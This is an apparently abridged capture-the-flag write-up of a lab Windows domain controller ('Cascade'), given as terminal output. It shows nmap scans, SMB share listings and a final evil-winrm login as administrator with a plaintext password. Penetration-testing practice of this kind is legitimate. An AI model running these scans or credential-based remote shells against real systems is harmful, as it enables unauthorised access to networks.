┌──(mikannse㉿kali)-[~/Desktop/Cascade] └─$ sudo nmap --min-rate=10000 -p- 10.10.10.182 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 11:36 CST Nmap scan report for 10.10.10.182 Host is up (0.079s latency). Not shown: 65520 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 49154/tcp open unknown 49155/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown 49165/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
┌──(mikannse㉿kali)-[~/Desktop/Cascade] └─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49165 10.10.10.182 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 11:38 CST Nmap scan report for 10.10.10.182 Host is up (0.072s latency).
PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-14 03:27:58Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49165/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (89%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 101.62 seconds
┌──(mikannse㉿kali)-[~/HTB/cascade] └─$ smbclient //10.10.10.182/NETLOGON -U s.smith Password for [WORKGROUP\s.smith]: Try "help" to get a list of possible commands. smb: \> dir . D 0 Thu Jan 16 05:50:33 2020 .. D 0 Thu Jan 16 05:50:33 2020 MapAuditDrive.vbs A 258 Thu Jan 16 05:50:15 2020 MapDataDrive.vbs A 255 Thu Jan 16 05:51:03 2020
6553343 blocks of size 4096. 1625526 blocks available
还有一个netlogon共享,Netlogon 服务是Windows Active Directory环境中的一项关键服务,它负责维护域内计算机的登录过程和服务
┌──(mikannse㉿kali)-[~/HTB/cascade] └─$ smbclient '//10.10.10.182/Audit$' -U s.smith Password for [WORKGROUP\s.smith]: Try "help" to get a list of possible commands. smb: \> dir . D 0 Thu Jan 30 02:01:26 2020 .. D 0 Thu Jan 30 02:01:26 2020 CascAudit.exe An 13312 Wed Jan 29 05:46:51 2020 CascCrypto.dll An 12288 Thu Jan 30 02:00:20 2020 DB D 0 Wed Jan 29 05:40:59 2020 RunAudit.bat A 45 Wed Jan 29 07:29:47 2020 System.Data.SQLite.dll A 363520 Sun Oct 27 14:38:36 2019 System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 14:38:38 2019 x64 D 0 Mon Jan 27 06:25:27 2020 x86 D 0 Mon Jan 27 06:25:27 2020
6553343 blocks of size 4096. 1625516 blocks available
┌──(mikannse㉿kali)-[~/HTB/cascade] └─$ evil-winrm -i 10.10.10.182 -u 'administrator' -p 'baCT3r1aN00dles' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami cascade\administrator